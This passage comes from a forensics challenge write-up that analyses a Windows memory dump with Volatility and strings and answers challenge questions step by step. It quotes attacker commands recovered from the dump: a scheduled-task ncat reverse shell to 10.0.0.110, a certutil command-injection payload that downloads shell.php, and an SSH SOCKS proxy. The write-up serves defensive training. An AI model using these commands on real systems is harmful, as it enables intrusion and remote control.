</pre></div></div><div><br /></div></div><div><div><b>Q:</b> How many privileges are these two processes running with?</div><div><b>A:</b> The process at PID 7164 and PID 4852 are both running with 35 privileges.</div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 7164 | sed '1,4d' | wc --lines
35</span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;"><br /></span></pre><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.privileges.Privs --pid 4852 | sed '1,4d' | wc --lines
35</span></pre></div></div><div><br /></div></div></div><div><br /></div><div>Looking at the SIDS, the process was running as:</div><div><br /></div><div><b>Q:</b> What SIDs is the VMware process at 7164 running with?</div><div><b>A: </b><i>vmtoolsd.exe </i>at 7164 is running with the following SIDs</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.getsids.GetSIDs --pid 7164</span></b><span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process SID Name
7164 vmtoolsd.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
7164 vmtoolsd.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users
7164 vmtoolsd.exe S-1-1-0 Everyone
7164 vmtoolsd.exe S-1-5-114 Local Account (Member of Administrators)
7164 vmtoolsd.exe S-1-5-32-544 Administrators
7164 vmtoolsd.exe S-1-5-32-545 Users
7164 vmtoolsd.exe S-1-5-4 Interactive
7164 vmtoolsd.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
7164 vmtoolsd.exe S-1-5-11 Authenticated Users
7164 vmtoolsd.exe S-1-5-15 This Organization
7164 vmtoolsd.exe S-1-5-113 Local Account
7164 vmtoolsd.exe S-1-5-5-0-1032752 Logon Session
7164 vmtoolsd.exe S-1-2-0 Local (Users with the ability to log in locally)
7164 vmtoolsd.exe S-1-5-64-10 NTLM Authentication
</span><b><span style="color: #fcff01;">7164 vmtoolsd.exe S-1-16-8192 Medium Mandatory Level</span></b></span><b><span style="color: #fcff01;">
</span></b></pre></div></div><div><br /></div></div><div><div><b>Q:</b> What SIDs is the PowerShell process at 4852 running with?</div><div><b>A:</b> PowerShell at 4852 is running with the following SIDs</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.getsids.GetSIDs --pid 4852</span></b><span><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
PID Process SID Name
4852 powershell.exe S-1-5-21-1563833629-3224366856-3602044515-1001 securitynik
4852 powershell.exe S-1-5-21-1563833629-3224366856-3602044515-513 Domain Users
4852 powershell.exe S-1-1-0 Everyone
4852 powershell.exe S-1-5-114 Local Account (Member of Administrators)
4852 powershell.exe S-1-5-32-544 Administrators
4852 powershell.exe S-1-5-32-545 Users
4852 powershell.exe S-1-5-4 Interactive
4852 powershell.exe S-1-2-1 Console Logon (Users who are logged onto the physical console)
4852 powershell.exe S-1-5-11 Authenticated Users
4852 powershell.exe S-1-5-15 This Organization
4852 powershell.exe S-1-5-113 Local Account
4852 powershell.exe S-1-5-5-0-1032752 Logon Session
4852 powershell.exe S-1-2-0 Local (Users with the ability to log in locally)
4852 powershell.exe S-1-5-64-10 NTLM Authentication
</span><b><span style="color: #fcff01;">4852 powershell.exe S-1-16-12288 High Mandatory Level</span></b></span></pre><div><br /></div></div></div></div><div><br /></div><div><div>Very disappointed that I still do not have enough concrete evidence to sell my case. However, there is still enough to take action. At this point, let's move forward with the challenge questions. We will find more evidence as we move along.</div><div><br /></div><div><b>Q:</b> What "Integrity Level" is this powershell.exe process at PID 4852 running with?</div><div><b>A:</b> PowerShell at 4852 is running with "High Mandatory Level"</div><div><br /></div><div><b>Q:</b> What "Integrity Level" is the VMWare process at PID 7164 running with?</div><div><b>A:</b> VMWare process at 7164 is running with "Medium Mandatory Level"</div><div><br /></div><div>Looking for persistence.</div><div><br /></div><div>Starting with the Registry Hives:</div></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.registry.hivelist.HiveList> hivelist.txt</span></b><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div><div>Q How many entries were returned for the registry hive list?</div><div>A: 42. Remember the lines at the top of the file needs to be removed:</div></div><div><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat hivelist.txt | sed '1,4d' | wc --lines
42</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> How many programs seems to be configured to start when the user computer starts up and the user logs in?</div><div>A: Looking at the run key it seems to be 1.</div><div><br /></div><div><b>Q:</b> What is the name of the program configured to start at login?</div><div><b>A:</b> It seems <i>oneDriveSetup.exe</i> is the only program configured to start at login.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">windows.registry.printkey.PrintKey --key "Software\Microsoft\Windows\CurrentVersion\Run"</span></b><span style="color: white;">
Volatility 3 Framework 2.5.2
Progress: 100.00 PDB scanning finished
Last Write Time Hive Offset Type Key Name Data Volatile
...
2023-07-12 04:42:30.000000 0xb98420e97000 REG_SZ \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run OneDriveSetup "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup" False
2023-07-12 04:42:29.000000 0xb98421072000 REG_SZ \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run OneDriveSetup "C:\Windows\System32\OneDriveSetup.exe /thfirstsetup" False</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>Continuing this hunt for persistence. </div><div><br /></div><div>Above, we saw ncat.exe is being used answer the follow questions:</div><div><br /></div><div><b>Q:</b> What is the full path is <i>ncat.exe </i>being run form?</div><div><b>A:</b> <i>'c:\Program Files (x86)\Nmap\ncat.exe'</i></div><div><br /></div><div><b>Q:</b> is <i>ncat.exe</i> using a "<i>normal user</i>" prompt or an "Administrator" prompt?</div><div><b>A:</b> <i>"Administrator"</i></div><div><br /></div><div><b>Q:</b> What is the full command line of the ncat.exe being used to establish persistence?</div><div><b>A:</b><i> schtasks /create /TN sec504-DCA /TR "'c:\Program Files (x86)\Nmap\ncat.exe' '10.0.0.110 '443' '--ssl' '--exec cmd.exe'" /SC Daily /ST 02:00 /f</i></div><div><br /></div><div><br /></div><div><b>Q:</b> Which Windows utility is being used to establish this persistence?</div><div><b>A:</b> schtasks.exe</div><div><br /></div><div>All of these questions can be answered from below.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">strings --all SECURITYNIK-WIN-20231116-235706.dmp | grep "ncat" | sort --unique | grep 'schtask'
]0;Administrator: Command Prompt - schtasks /create /TN sec504-DCA /TR "'c:\Program Files (x86)\Nmap\ncat.exe' '10.0.0.110 '443' '--ssl' '--exec cmd.exe'" /SC Daily /ST 02:00 /f</span>
</pre></div></div><div><br /></div></div><div><div>Q: What is the objective of this persistence mechanism?</div><div>A: This schedule task is set to send this host command prompt via SSL to the host at 10.0.0.110 on port 443 at 2 AM Daily.</div><div><br /></div><div>IP 10.0.0.110 seems to be a prominent fixture through this incident. Even further evidence that we should be concerned about this host.</div><div><br /></div><div>Extract all ASCII Strings.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: #fcff01;"><b>strings </b></span><span style="color: white;">SECURITYNIK-WIN-20231116-235706.dmp </span><b><span style="color: #fcff01;">> strings.txt</span></b>
</pre></div></div><div><br /></div></div><div><div>Not to worry, I know I should look at the other encodings also via "<i>--encoding=[s|S|b|l|B|L]</i>". However, this is the approach I am taking for this challenge.</div><div><br /></div><div>There seems to be some interaction with the "upload" folder. </div><div><b>Q:</b> What is the name of the file uploaded? </div><div><b>A:</b> The uploaded file is "<i>shell.php</i>"</div><div><br /></div><div><b>Q:</b> What is the tool used to allow the threat actor to live off the land to "upload" one or more files?</div><div><b>A:</b> Tool used to live off the land is "<i>certutil.exe</i>"</div><div><br /></div><div><b>Q:</b> What type of vulnerability does it seem the threat actor was able to leverage?</div><div><b>A:</b> The vulnerability is command injection</div><div><br /></div><div><b>Q:</b> What is the full command that was used to exploit this vulnerability?</div><div><b>A:</b> See below for all the additional information.</div><div><br /></div><div>Below also answers all the questions above.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><b><span style="color: #fcff01;">grep "10.0.0.110"</span></b><span style="color: white;"> strings.txt | </span><b><span style="color: #fcff01;">grep certutil</span></b><span style="color: white;">
.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=SubmitP
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ..\upload\shell.php
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
cmd.exe /s /c "ping 127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php ."
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
127.0.0.1 & certutil -f -URLCache http://10.0.0.110/shell.php .
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit_
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.php&Submit=Submit"M{
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+..%5Cupload%5Cshell.phppload%5Cshell.php+.&Submit=Submit
ip=127.0.0.1+%26+certutil+-f+-URLCache+http%3A%2F%2F10.0.0.110%2Fshell.php+.&Submit=Submit</span>
</pre></div></div><div><br /></div></div><div>Looking at the "DeviceType"</div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.devicetree.DeviceTree > devicetree.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> How many unique device types are seen within the memory dump?</div><div><b>A:</b> 30 unique devices</div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d' | wc --lines
30</span></pre></div></div><div><br /></div><div>While above reports 30, the answer is 29 because there is a line in the middle that is empty with "2".</div><div><br /></div><div><b>Q: </b>What is/are the name(s) of the devices?</div><div><b>A:</b> See below</div></div><div><br /></div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat devicetree.txt | awk --field-separator=' ' '{ print $NF }' | sort | uniq --count | sort --numeric-sort --reverse | sed '1d;$d' | sed '$d'
48 FILE_DEVICE_UNKNOWN
21 FILE_DEVICE_DISK
19 FILE_DEVICE_NETWORK
18 UNKNOWN
12 FILE_DEVICE_BUS_EXTENDER
9 FILE_DEVICE_MOUSE
9 FILE_DEVICE_DISK_FILE_SYSTEM
9 FILE_DEVICE_CONTROLLER
7 FILE_DEVICE_NETWORK_FILE_SYSTEM
5 FILE_DEVICE_KS
3 FILE_DEVICE_VIDEO
3 FILE_DEVICE_NAMED_PIPE
3 FILE_DEVICE_CD_ROM
2 FILE_DEVICE_NULL
2 FILE_DEVICE_MAILSLOT
2 FILE_DEVICE_ACPI
2
1 FILE_DEVICE_TRANSPORT
1 FILE_DEVICE_TAPE_FILE_SYSTEM
1 FILE_DEVICE_SOUND
1 FILE_DEVICE_SERIAL_PORT
1 FILE_DEVICE_SCREEN
1 FILE_DEVICE_PHYSICAL_NETCARD
1 FILE_DEVICE_NETWORK_BROWSER
1 FILE_DEVICE_KSEC
1 FILE_DEVICE_KEYBOARD
1 FILE_DEVICE_CD_ROM_FILE_SYSTEM
1 FILE_DEVICE_BEEP
1 FILE_DEVICE_BATTERY
1 FILE_DEVICE_8042_PORT</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> From the device tree how many have a "<i>DeviceName</i>" of HTTP and a "<i>DriverNameofAttDevice</i>" of "<i>ClientSession</i>"?</div><div><b>A:</b> There is only 1 HTTP "<i>ClientSession</i>"</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat devicetree.txt | grep --perl-regexp 'HTTP|ClientSession'
0xe78beff21e50 DRV HTTP N/A N/A N/A
* 0xe78beff21e50 DEV HTTP ClientSession N/A FILE_DEVICE_NETWORK</span>
</pre><div><br /></div></div></div><div><br /></div></div><div><div>In the list of ESTABLISHED network sessions, we also saw there is a SSH connection:</div><div><br /></div><div><b>Q:</b> What does the SSH manpage say about <i>"-D"</i>?</div><div><b>A:</b> If we look at the SSH Manpage, we see<i> -D [bind_address:]port</i>.</div><div><br /></div><div>This means we can specify an IP address with the port. Since we already know the port we can assume at a minimum it is listening on <i>127.0.0.1</i>. Let's test that theory.</div><div><br /></div><div><br /></div><div><b>Q:</b> What is the full path(s) of the SSH "<i>known_hosts</i>" file on this system:</div><div><b>A: </b> </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">strings --all SECURITYNIK-WIN-20231116-235706.dmp | </span><span style="color: #fcff01;"><b>grep "known_hosts"</b></span><span style="color: white;"> | sort --unique
4known_hosts (C:\Users\administrator.SECURITYNIK-WIN\.ssh)
4known_hosts (C:\Users\securitynik\.ssh)
*!C:\Users\administrator.SECURITYNIK-WIN\.ssh\known_hosts.old
!C:\Users\securitynik\.ssh\known_hosts
C:\Users\securitynik/.ssh/known_hosts
C:\Users\securitynik/.ssh/known_hosts2
!C:\Users\securitynik\.ssh\known_hosts.old</span>
</pre></div></div><div><br /></div><div>We can also see that it seems SSH was being used as a local "dynamic" proxy. </div><div>We learned this above, so this is just reinforcement of our knowledge. </div><div>This could be used for relaying/proxying communication. </div><div><br /></div><div><b>Q:</b> What is the command line, local port, username and remote IP address that SSH proxy connection is using?</div><div><b>A</b>: </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">strings --all SECURITYNIK-WIN-20231116-235706.dmp | </span><b><span style="color: #fcff01;">grep --perl-regexp 'ssh\s+\-D'</span></b><span style="color: white;">
ssh -D 9999 kali@10.0.0.110 -N -vvv
]0;Administrator: Windows PowerShell - ssh -D 9999 kali@10.0.0.110 -N -vvv</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> What does the "-N" do in the identified command?</div><div><b>A:</b> "Do not execute a remote command. This is useful for just forwarding ports"</div><div><br /></div><div><b>Q:</b> Is the PowerShell prompt running as a "normal user" or "Administrator" ?</div><div><b>A:</b> "Administrator"</div><div><br /></div><div><b>Q:</b> What is the application that seems to be connecting to the local "dynamic" proxy?</div><div><b>A:</b> chrome.exe</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">strings --all SECURITYNIK-WIN-20231116-235706.dmp | </span><b><span style="color: #fcff01;">grep "chrome"</span></b><span style="color: white;"> | </span><span style="color: #fcff01;"><b>grep "127.0.0.1:9999"</b></span><span style="color: white;">
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --proxy-server=socks5://127.0.0.1:9999 --mojo-platform-channel-handle=2144 --field-trial-handle=1868,i,3512365481249750963,10747349760151142710,262144 /prefetch:8
chrome.exe --proxy-server="socks5://127.0.0.1:9999"
chrome.exe --proxy-server="socks5://127.0.0.1:9999"</span>
</pre></div></div><div><br /></div></div><div><div>Staying a bit on this port 9999 traffic. What else is going on there.</div><div><br /></div><div>At the same time, we saw port 443 earlier. Let's see what we can find for these two ports</div><div><br /></div><div><b>Q: </b>What was/were the name of the file(s) downloaded from <i>http://10.0.0.108:9999</i>?</div><div><b>A:</b> Looks like <i>putty_64.exe</i>, <i>putty_x64.exe, putty.exe</i> and <i>putty_x64.md5.txt</i> were all downloaded </div></div><div><br /></div><div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings SECURITYNIK-WIN-20231116-235706.dmp | </span><b><span style="color: #fcff01;">grep --perl-regexp 'http*://10.0.0.108:(443|9999)</span></b><span style="color: white;">.*' --only-matching | sort --unique | grep --perl-regexp '(\.exe|\.txt)' | sed 's/"//'
http://10.0.0.108:9999/putty_64.exe
http://10.0.0.108:9999/putty_64.exe)
http://10.0.0.108:9999/putty.exe
http://10.0.0.108:9999/putty.exe
http://10.0.0.108:9999/putty_x64.exe
http://10.0.0.108:9999/putty_x64.md5.txt</span></span>
</pre><div><br /></div></div></div><div><br /></div><div><b>Q:</b> Where is/are the executable file(s) seen in the previous question stored on the system?</div><div><b>A:</b> The executable files is stored primarily in the c:\users\securitynik\Downloads folder<br /><br /></div><div>We can see above the locations of where the files were stored on the file system.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ strings SECURITYNIK-WIN-20231116-235706.dmp | </span><b><span style="color: #fcff01;">grep --perl-regexp 'putty.*?\.exe' | grep --ignore-case --perl-regexp "^c:.*?\.exe$"</span></b><span style="color: white;">
C:\Users\securitynik\Downloads\putty_x64 (2).exe
C:\Users\securitynik\Downloads\putty_64.exe
C:\TOOLS\elitewrap\original_putty.exe
C:\Users\securitynik\Downloads\putty.exe
C:\Users\securitynik\Downloads\putty.exe
C:\Users\securitynik\Downloads\putty_new.exe</span>
</pre><div><br /></div></div></div><div><br /></div></div><div>Extracting data from the file system. Grabbing all the files found storing them in a txt file for further analysis.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">~/volatility3/vol.py --output-dir 4852/ --file SECURITYNIK-WIN-20231116-235706.dmp </span><span style="color: #fcff01;"><b>windows.filescan > filescan.txt</b></span><span style="color: white;">
Progress: 100.00 PDB scanning finished</span>
</pre></div></div><div><br /></div></div><div><br /></div><div><div><b>Q:</b> When performing a <i>filescan</i>, how many files/lines were returned?</div><div><b>A:</b> There were 8035 lines found but 8029 files.</div></div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | wc --lines
8029</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> Similarly, how many unique files were returned?</div><div><b>A:</b> There were 3227 unique files returned. Note, there were 6 lines reported with non-ASCII characters.</div><div><br /></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | uniq | head --lines -6 | wc --lines
3227</span></pre></div></div><div><br /></div></div><div><b>Q:</b> What were the top 10 files/lines found. Note, in this case directory paths would also be considered as files for this purpose?</div><div><b>A:</b> </div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse | head --lines=10
1480 \$Directory
469 \Program
359 \Users\securitynik\AppData\Local\Google\Chrome\User
223 \$MapAttributeValue
172 \Users\securitynik\AppData\Local\Microsoft\Edge\User
158 \CMNotify
140 \Windows\System32
109 \Windows\Registration\R000000000006.clb
107 \Endpoint
77 \Windows\System32\svchost.exe
....</span>
</pre></div></div><div><br /></div></div><div><div><b>Q:</b> Of these unique files, how many are text (".txt") files and what are their counts?</div><div><b>A:</b> 3 Files returned with .txt extension.</div></div><div><div><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 16.25px; margin-bottom: 0px; margin-top: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]</span>
<span style="color: white;">└─$ </span><span style="color: white;">cat filescan.txt | awk --field-separator=' ' '{ print $2 }' | sed '1,4d' | sort | head --lines -6 | uniq --count | sort --numeric-sort --reverse | </span><b><span style="color: #fcff01;">grep ".txt"</span></b><span style="color: white;">
1 \xampp\readme_de.txt
1 \Windows\appcompat\pca\PcaAppLaunchDic.txt
1 \Users\securitynik\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</span>
